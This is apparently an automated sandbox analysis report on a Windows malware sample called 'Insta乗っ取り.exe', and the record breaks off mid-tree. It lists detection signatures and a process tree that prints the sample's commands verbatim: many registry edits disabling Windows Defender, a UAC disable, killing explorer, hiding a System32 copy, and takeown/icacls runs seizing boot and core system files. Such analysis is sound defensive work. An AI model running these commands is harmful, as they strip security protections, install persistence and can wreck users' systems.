bc6af9ff1b56c779aa75f349a07c4627905f01dff6a68565b4b4baa4ee9f5d70

Analysis

max time kernel
9s
max time network
7s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
26-11-2024 13:01

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

Insta乗っ取り.exe
Size

12.8MB
MD5

de7860d4d6be9c13acee02489caa19a5
SHA1

4b561424d054f36c247f400e95ec0a4a226687d3
SHA256

bc6af9ff1b56c779aa75f349a07c4627905f01dff6a68565b4b4baa4ee9f5d70
SHA512

bbebb9d972d6653639b597527d70798626eacb93b89a3227da480a0091b8fae08988082633043bc76b741420eb18385b5025c115e451938bf9d83b05230fd74f
SSDEEP

393216:9892kr6LfOYD+hQdPC5OA3+76PHWaZOIEUespeZlMQJM9YH:CVmLGYD+haC5OA3+76PHq40MQO6

Score

10^/10

defense_evasion discovery evasion execution exploit persistence trojan

Malware Config

Signatures

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

Processes:

Insta乗っ取り.exe

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Windows\\System32\\Insta乗っ取り.exe"	Insta乗っ取り.exe

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Disables Task Manager via registry modification
evasion

Possible privilege escalation attempt 29 IoCs

exploit

Processes:

icacls.exeicacls.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exetakeown.exe

pid	Process
3952	icacls.exe
3460	icacls.exe
3428	icacls.exe
1964	icacls.exe
4240	takeown.exe
2768	takeown.exe
1464	takeown.exe
4424	takeown.exe
4796	icacls.exe
2516	takeown.exe
4832	takeown.exe
3724	icacls.exe
4896	icacls.exe
4680	takeown.exe
3664	takeown.exe
2444	takeown.exe
2760	takeown.exe
4776	takeown.exe
756	takeown.exe
468	takeown.exe
3944	icacls.exe
1888	icacls.exe
4320	icacls.exe
1464	icacls.exe
4876	takeown.exe
4104	icacls.exe
1152	icacls.exe
4776	icacls.exe
1956	takeown.exe

Sets file to hidden 1 TTPs 1 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

Processes:

attrib.exe

pid	Process
3820	attrib.exe

Executes dropped EXE 2 IoCs

Processes:

Insta乗っ取り.exeInsta乗っ取り.exe

pid	Process
2848	Insta乗っ取り.exe
4336	Insta乗っ取り.exe

Loads dropped DLL 19 IoCs

Processes:

Insta乗っ取り.exe

pid	Process
2848	Insta乗っ取り.exe
2848	Insta乗っ取り.exe
2848	Insta乗っ取り.exe
2848	Insta乗っ取り.exe
2848	Insta乗っ取り.exe
2848	Insta乗っ取り.exe
2848	Insta乗っ取り.exe
2848	Insta乗っ取り.exe
2848	Insta乗っ取り.exe
2848	Insta乗っ取り.exe
2848	Insta乗っ取り.exe
2848	Insta乗っ取り.exe
2848	Insta乗っ取り.exe
2848	Insta乗っ取り.exe
2848	Insta乗っ取り.exe
2848	Insta乗っ取り.exe
2848	Insta乗っ取り.exe
2848	Insta乗っ取り.exe
2848	Insta乗っ取り.exe

Modifies file permissions 1 TTPs 29 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

takeown.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid	Process
4680	takeown.exe
1464	takeown.exe
4320	icacls.exe
3428	icacls.exe
3460	icacls.exe
3944	icacls.exe
1888	icacls.exe
1152	icacls.exe
2516	takeown.exe
4424	takeown.exe
2760	takeown.exe
4776	icacls.exe
2444	takeown.exe
4240	takeown.exe
2768	takeown.exe
468	takeown.exe
1956	takeown.exe
1464	icacls.exe
4876	takeown.exe
756	takeown.exe
3952	icacls.exe
4776	takeown.exe
3664	takeown.exe
4832	takeown.exe
4104	icacls.exe
4796	icacls.exe
3724	icacls.exe
1964	icacls.exe
4896	icacls.exe

File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
defense_evasion

Windows File and Directory Permissions Modification
T1222.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

Processes:

flow	ioc
1	pastebin.com
2	pastebin.com

Drops file in System32 directory 3 IoCs

Processes:

Insta乗っ取り.exeattrib.exe

description	ioc	Process
File created	C:\Windows\System32\Insta乗っ取り.exe	Insta乗っ取り.exe
File opened for modification	C:\Windows\System32\Insta乗っ取り.exe	Insta乗っ取り.exe
File opened for modification	C:\Windows\System32\Insta乗っ取り.exe	attrib.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

Processes:

powershell.exe

pid	Process
2032	powershell.exe

Modifies registry key 1 TTPs 12 IoCs

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid	Process
820	reg.exe
3496	reg.exe
4564	reg.exe
3424	reg.exe
1888	reg.exe
2784	reg.exe
2640	reg.exe
1096	reg.exe
564	reg.exe
1796	reg.exe
1988	reg.exe
1856	reg.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exe

pid	Process
2032	powershell.exe
2032	powershell.exe
2032	powershell.exe

Suspicious use of AdjustPrivilegeToken 16 IoCs

Processes:

Insta乗っ取り.exepowershell.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exe

description	pid	Process
Token: SeDebugPrivilege	2848	Insta乗っ取り.exe
Token: SeDebugPrivilege	2032	powershell.exe
Token: SeTakeOwnershipPrivilege	4680	takeown.exe
Token: SeTakeOwnershipPrivilege	4776	takeown.exe
Token: SeTakeOwnershipPrivilege	3664	takeown.exe
Token: SeTakeOwnershipPrivilege	2444	takeown.exe
Token: SeTakeOwnershipPrivilege	4876	takeown.exe
Token: SeTakeOwnershipPrivilege	1464	takeown.exe
Token: SeTakeOwnershipPrivilege	2768	takeown.exe
Token: SeTakeOwnershipPrivilege	756	takeown.exe
Token: SeTakeOwnershipPrivilege	468	takeown.exe
Token: SeTakeOwnershipPrivilege	4832	takeown.exe
Token: SeTakeOwnershipPrivilege	2516	takeown.exe
Token: SeTakeOwnershipPrivilege	4424	takeown.exe
Token: SeTakeOwnershipPrivilege	2760	takeown.exe
Token: SeTakeOwnershipPrivilege	1956	takeown.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Insta乗っ取り.exeInsta乗っ取り.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	Process	procid_target
PID 4072 wrote to memory of 2848	4072	Insta乗っ取り.exe	79
PID 4072 wrote to memory of 2848	4072	Insta乗っ取り.exe	79
PID 2848 wrote to memory of 3820	2848	Insta乗っ取り.exe	81
PID 2848 wrote to memory of 3820	2848	Insta乗っ取り.exe	81
PID 2848 wrote to memory of 2436	2848	Insta乗っ取り.exe	83
PID 2848 wrote to memory of 2436	2848	Insta乗っ取り.exe	83
PID 2848 wrote to memory of 2032	2848	Insta乗っ取り.exe	85
PID 2848 wrote to memory of 2032	2848	Insta乗っ取り.exe	85
PID 2848 wrote to memory of 1588	2848	Insta乗っ取り.exe	87
PID 2848 wrote to memory of 1588	2848	Insta乗っ取り.exe	87
PID 1588 wrote to memory of 1796	1588	cmd.exe	89
PID 1588 wrote to memory of 1796	1588	cmd.exe	89
PID 2848 wrote to memory of 4568	2848	Insta乗っ取り.exe	90
PID 2848 wrote to memory of 4568	2848	Insta乗っ取り.exe	90
PID 4568 wrote to memory of 4564	4568	cmd.exe	92
PID 4568 wrote to memory of 4564	4568	cmd.exe	92
PID 2848 wrote to memory of 5100	2848	Insta乗っ取り.exe	93
PID 2848 wrote to memory of 5100	2848	Insta乗っ取り.exe	93
PID 5100 wrote to memory of 1988	5100	cmd.exe	95
PID 5100 wrote to memory of 1988	5100	cmd.exe	95
PID 2848 wrote to memory of 1228	2848	Insta乗っ取り.exe	96
PID 2848 wrote to memory of 1228	2848	Insta乗っ取り.exe	96
PID 1228 wrote to memory of 3424	1228	cmd.exe	98
PID 1228 wrote to memory of 3424	1228	cmd.exe	98
PID 2848 wrote to memory of 1444	2848	Insta乗っ取り.exe	99
PID 2848 wrote to memory of 1444	2848	Insta乗っ取り.exe	99
PID 1444 wrote to memory of 1856	1444	cmd.exe	101
PID 1444 wrote to memory of 1856	1444	cmd.exe	101
PID 2848 wrote to memory of 1844	2848	Insta乗っ取り.exe	102
PID 2848 wrote to memory of 1844	2848	Insta乗っ取り.exe	102
PID 1844 wrote to memory of 1888	1844	cmd.exe	104
PID 1844 wrote to memory of 1888	1844	cmd.exe	104
PID 2848 wrote to memory of 3196	2848	Insta乗っ取り.exe	105
PID 2848 wrote to memory of 3196	2848	Insta乗っ取り.exe	105
PID 3196 wrote to memory of 2784	3196	cmd.exe	107
PID 3196 wrote to memory of 2784	3196	cmd.exe	107
PID 2848 wrote to memory of 4480	2848	Insta乗っ取り.exe	108
PID 2848 wrote to memory of 4480	2848	Insta乗っ取り.exe	108
PID 4480 wrote to memory of 820	4480	cmd.exe	110
PID 4480 wrote to memory of 820	4480	cmd.exe	110
PID 2848 wrote to memory of 4852	2848	Insta乗っ取り.exe	111
PID 2848 wrote to memory of 4852	2848	Insta乗っ取り.exe	111
PID 4852 wrote to memory of 2640	4852	cmd.exe	113
PID 4852 wrote to memory of 2640	4852	cmd.exe	113
PID 2848 wrote to memory of 4316	2848	Insta乗っ取り.exe	114
PID 2848 wrote to memory of 4316	2848	Insta乗っ取り.exe	114
PID 4316 wrote to memory of 1096	4316	cmd.exe	116
PID 4316 wrote to memory of 1096	4316	cmd.exe	116
PID 2848 wrote to memory of 964	2848	Insta乗っ取り.exe	117
PID 2848 wrote to memory of 964	2848	Insta乗っ取り.exe	117
PID 964 wrote to memory of 3496	964	cmd.exe	119
PID 964 wrote to memory of 3496	964	cmd.exe	119
PID 2848 wrote to memory of 1720	2848	Insta乗っ取り.exe	120
PID 2848 wrote to memory of 1720	2848	Insta乗っ取り.exe	120
PID 1720 wrote to memory of 564	1720	cmd.exe	122
PID 1720 wrote to memory of 564	1720	cmd.exe	122
PID 2848 wrote to memory of 624	2848	Insta乗っ取り.exe	123
PID 2848 wrote to memory of 624	2848	Insta乗っ取り.exe	123
PID 624 wrote to memory of 2844	624	cmd.exe	125
PID 624 wrote to memory of 2844	624	cmd.exe	125
PID 2848 wrote to memory of 4644	2848	Insta乗っ取り.exe	126
PID 2848 wrote to memory of 4644	2848	Insta乗っ取り.exe	126
PID 4644 wrote to memory of 3840	4644	cmd.exe	128
PID 4644 wrote to memory of 3840	4644	cmd.exe	128

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

Processes:

attrib.exe

pid	Process
3820	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Insta乗っ取り.exe
"C:\Users\Admin\AppData\Local\Temp\Insta乗っ取り.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4072
- C:\Users\Admin\AppData\Local\Temp\onefile_4072_133770996895269274\Insta乗っ取り.exe
  C:\Users\Admin\AppData\Local\Temp\Insta乗っ取り.exe
  2⤵
  - Modifies WinLogon for persistence
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in System32 directory
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2848
- - C:\Windows\SYSTEM32\attrib.exe
    attrib +r +s +h "C:\Windows\System32\Insta乗っ取り.exe"
    3⤵
    - Sets file to hidden
    - Drops file in System32 directory
    - Views/modifies file attributes
    PID:3820
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c
    3⤵
    PID:2436
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Stop-Process -Name "explorer" -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add HKLM\SOFTWARE\Policies\Microsoft\Windows Defender /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1588
  - - C:\Windows\system32\reg.exe
      reg add HKLM\SOFTWARE\Policies\Microsoft\Windows Defender /v DisableAntiSpyware /t REG_DWORD /d 1 /f
      4⤵
      Modifies registry key
      PID:1796
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add HKLM\SOFTWARE\Policies\Microsoft\Windows Defender /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4568
  - - C:\Windows\system32\reg.exe
      reg add HKLM\SOFTWARE\Policies\Microsoft\Windows Defender /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
      4⤵
      Modifies registry key
      PID:4564
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add HKLM\SOFTWARE\Policies\Microsoft\Windows Defender /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5100
  - - C:\Windows\system32\reg.exe
      reg add HKLM\SOFTWARE\Policies\Microsoft\Windows Defender /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
      4⤵
      Modifies registry key
      PID:1988
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add HKLM\SOFTWARE\Policies\Microsoft\Windows Defender /v DisableOnAccessProtection /t REG_DWORD /d 1 /f"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1228
  - - C:\Windows\system32\reg.exe
      reg add HKLM\SOFTWARE\Policies\Microsoft\Windows Defender /v DisableOnAccessProtection /t REG_DWORD /d 1 /f
      4⤵
      Modifies registry key
      PID:3424
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add HKLM\SOFTWARE\Policies\Microsoft\Windows Defender /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1444
  - - C:\Windows\system32\reg.exe
      reg add HKLM\SOFTWARE\Policies\Microsoft\Windows Defender /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f
      4⤵
      Modifies registry key
      PID:1856
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add HKLM\SOFTWARE\Policies\Microsoft\Windows Defender /v DisableEmailScanning /t REG_DWORD /d 1 /f"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1844
  - - C:\Windows\system32\reg.exe
      reg add HKLM\SOFTWARE\Policies\Microsoft\Windows Defender /v DisableEmailScanning /t REG_DWORD /d 1 /f
      4⤵
      Modifies registry key
      PID:1888
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add HKLM\SOFTWARE\Policies\Microsoft\Windows Defender /v ThreatsReportDisabled /t REG_DWORD /d 1 /f"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3196
  - - C:\Windows\system32\reg.exe
      reg add HKLM\SOFTWARE\Policies\Microsoft\Windows Defender /v ThreatsReportDisabled /t REG_DWORD /d 1 /f
      4⤵
      Modifies registry key
      PID:2784
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add HKLM\SOFTWARE\Policies\Microsoft\Windows Defender /v SubmitSamplesConsent /t REG_DWORD /d 2 /f"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4480
  - - C:\Windows\system32\reg.exe
      reg add HKLM\SOFTWARE\Policies\Microsoft\Windows Defender /v SubmitSamplesConsent /t REG_DWORD /d 2 /f
      4⤵
      Modifies registry key
      PID:820
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add HKLM\SOFTWARE\Policies\Microsoft\Windows Defender /v DenyEnhancedNotifications /t REG_DWORD /d 1 /f"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4852
  - - C:\Windows\system32\reg.exe
      reg add HKLM\SOFTWARE\Policies\Microsoft\Windows Defender /v DenyEnhancedNotifications /t REG_DWORD /d 1 /f
      4⤵
      Modifies registry key
      PID:2640
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add HKLM\SOFTWARE\Policies\Microsoft\Windows Defender /v DisableBlockAtFirstSeen /t REG_DWORD /d 1 /f"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4316
  - - C:\Windows\system32\reg.exe
      reg add HKLM\SOFTWARE\Policies\Microsoft\Windows Defender /v DisableBlockAtFirstSeen /t REG_DWORD /d 1 /f
      4⤵
      Modifies registry key
      PID:1096
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add HKLM\SOFTWARE\Policies\Microsoft\Windows Defender /v DisableIntrusionPreventionSystem /t REG_DWORD /d 1 /f"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:964
  - - C:\Windows\system32\reg.exe
      reg add HKLM\SOFTWARE\Policies\Microsoft\Windows Defender /v DisableIntrusionPreventionSystem /t REG_DWORD /d 1 /f
      4⤵
      Modifies registry key
      PID:3496
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add HKLM\SOFTWARE\Policies\Microsoft\Windows Defender /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1720
  - - C:\Windows\system32\reg.exe
      reg add HKLM\SOFTWARE\Policies\Microsoft\Windows Defender /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
      4⤵
      Modifies registry key
      PID:564
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:624
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
      4⤵
      UAC bypass
      PID:2844
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 0 /f"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4644
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 0 /f
      4⤵
      PID:3840
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\winload.exe" /a"
    3⤵
    PID:2416
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\winload.exe" /a
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      Suspicious use of AdjustPrivilegeToken
      PID:4680
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\Boot\winload.exe" /a"
    3⤵
    PID:1048
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\Boot\winload.exe" /a
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      Suspicious use of AdjustPrivilegeToken
      PID:4776
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\hal.dll" /a"
    3⤵
    PID:3476
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\hal.dll" /a
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      Suspicious use of AdjustPrivilegeToken
      PID:3664
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\BOOTVID.DLL" /a"
    3⤵
    PID:3272
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\BOOTVID.DLL" /a
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      Suspicious use of AdjustPrivilegeToken
      PID:2444
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\Boot\winresume.exe" /a"
    3⤵
    PID:2136
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\Boot\winresume.exe" /a
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      Suspicious use of AdjustPrivilegeToken
      PID:4876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\winload.efi" /a"
    3⤵
    PID:2100
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\winload.efi" /a
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      Suspicious use of AdjustPrivilegeToken
      PID:1464
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\Boot\winload.efi" /a"
    3⤵
    PID:2504
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\Boot\winload.efi" /a
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      Suspicious use of AdjustPrivilegeToken
      PID:2768
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\Boot\winresume.efi" /a"
    3⤵
    PID:4576
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\Boot\winresume.efi" /a
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      Suspicious use of AdjustPrivilegeToken
      PID:756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\bootsect.exe" /a"
    3⤵
    PID:2436
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\bootsect.exe" /a
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      Suspicious use of AdjustPrivilegeToken
      PID:468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\bootim.exe" /a"
    3⤵
    PID:4416
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\bootim.exe" /a
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      Suspicious use of AdjustPrivilegeToken
      PID:4832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\bootux.dl" /a"
    3⤵
    PID:2932
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\bootux.dl" /a
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      Suspicious use of AdjustPrivilegeToken
      PID:2516
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\kernel32.dll" /a"
    3⤵
    PID:996
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\kernel32.dll" /a
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      Suspicious use of AdjustPrivilegeToken
      PID:4424
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\user32.dll" /a"
    3⤵
    PID:4384
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\user32.dll" /a
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      Suspicious use of AdjustPrivilegeToken
      PID:2760
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\win32k.sys" /a"
    3⤵
    PID:3336
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\win32k.sys" /a
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      Suspicious use of AdjustPrivilegeToken
      PID:1956
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\winload.exe" /grant administrators:F"
    3⤵
    PID:2140
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\winload.exe" /grant administrators:F
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:3944
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\Boot\winload.exe" /grant administrators:F"
    3⤵
    PID:3632
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\Boot\winload.exe" /grant administrators:F
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:1888
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\hal.dll" /grant administrators:F"
    3⤵
    PID:2564
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\hal.dll" /grant administrators:F
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:4104
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\BOOTVID.DLL" /grant administrators:F"
    3⤵
    PID:2284
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\BOOTVID.DLL" /grant administrators:F
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:4796
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\Boot\winresume.exe" /grant administrators:F"
    3⤵
    PID:4116
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\Boot\winresume.exe" /grant administrators:F
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:3724
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\winload.efi" /grant administrators:F"
    3⤵
    PID:1536
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\winload.efi" /grant administrators:F
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:4320
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\Boot\winload.efi" /grant administrators:F"
    3⤵
    PID:2684
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\Boot\winload.efi" /grant administrators:F
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:1152
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\Boot\winresume.efi" /grant administrators:F"
    3⤵
    PID:1712
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\Boot\winresume.efi" /grant administrators:F
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:1964
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\bootsect.exe" /grant administrators:F"
    3⤵
    PID:3816
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\bootsect.exe" /grant administrators:F
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:3428
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\bootim.exe" /grant administrators:F"
    3⤵
    PID:3296
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\bootim.exe" /grant administrators:F
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:3952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\bootux.dl" /grant administrators:F"
    3⤵
    PID:4308
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\bootux.dl" /grant administrators:F
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:3460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\kernel32.dll" /grant administrators:F"
    3⤵
    PID:1068
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\kernel32.dll" /grant administrators:F
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:4776
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\user32.dll" /grant administrators:F"
    3⤵
    PID:668
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\user32.dll" /grant administrators:F
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:4896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\win32k.sys" /grant administrators:F"
    3⤵
    PID:3404
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\win32k.sys" /grant administrators:F
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:1464
- - C:\Windows\system32\cmd.exe
